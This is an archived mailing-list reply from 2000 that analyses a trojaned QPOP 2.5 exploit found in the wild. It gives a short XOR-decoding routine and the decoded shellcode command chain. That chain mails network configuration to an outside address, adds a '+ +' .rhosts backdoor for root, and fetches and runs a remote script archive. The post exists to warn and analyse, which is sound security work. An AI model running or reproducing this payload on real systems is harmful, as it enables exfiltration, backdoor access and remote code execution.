Vulnerability Development mailing list archives
Re: QPOP2.5* exploit ??
From: typo () INFERNO TUSCULUM EDU (typo () INFERNO TUSCULUM EDU)
Date: Sun, 14 May 2000 23:18:57 +0200
On Sun, May 14, 2000 at 12:30:03PM -0500, Ryan Sweat wrote:
this has been found in the wild, however there seems to be a trojan in the shellcode. Popper 2.5* has been thought to be safe. I would not reccomend running this on your own machine unless you crack the shellcode and see what it does.
trojan is XOR encoded and decodes itself. i was unable to obtain a copy of solwar.tar. tar returns warnings when solwar.tar can't be retrieved. shellcode seems to be generated by stealth's hellkit (available from http://teso.scene.at). enemy:~# tail -2 as.c; gcc as.c -o as; ./as main() { char *x; for (x=shellcode; x <= strlen(shellcode)+shellcode; x++) printf("%c", *x ^ 2); printf("\n"); } .../bin/sh-c../sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null; echo '+ +' >> ~root/.rhosts; rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar; tar -xvf solwar* >> /dev/null; cd solwar; chmod +x solwar.sh; ./solwar.sh >> /dev/null; cd ..; rm -rf solwar... -- so much entropy, so little time
Current thread:
- Re: regarding phrack49's stack smashing tutorial, (continued)
- Re: regarding phrack49's stack smashing tutorial Precious Roy (May 13)
- Re: regarding phrack49's stack smashing tutorial Bluefish (May 13)
- QPOP2.5* exploit ?? Ryan Sweat (May 14)
- Re: QPOP2.5* exploit ?? H D Moore (May 14)
- Re: QPOP2.5* exploit ?? jms (May 13)
- Napster Fix optik (May 14)
- Re: QPOP2.5* exploit ?? Maurycy Prodeus (May 15)
- Re: QPOP2.5* exploit ?? jms (May 14)
- Re: QPOP2.5* exploit ?? Eric LeBlanc (May 15)
- hi sparc qpop info sp00n () GMX DE (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? Dimitry Andric (May 14)
- Re: QPOP2.5* exploit ?? Martin Ixter (May 14)
- TROJAN WARNING: Re: QPOP2.5* exploit ?? Nic Bellamy (May 14)
- Re: QPOP2.5* exploit ?? phi-vulndev () EXORSUS NET (May 14)
- Bubble Boy Virus Spreading Mechanism Andrew Leong (May 15)
- Re: QPOP2.5* exploit ?? Lluis Mora (May 15)
- Bugtraq Stats for the last 3 years available now. Alfred Huger (May 15)
- xsoldier mandrake exploit. egid=games with the right shellcode Larry C$ (May 15)
- Re: QPOP2.5* exploit ?? rpc (May 14)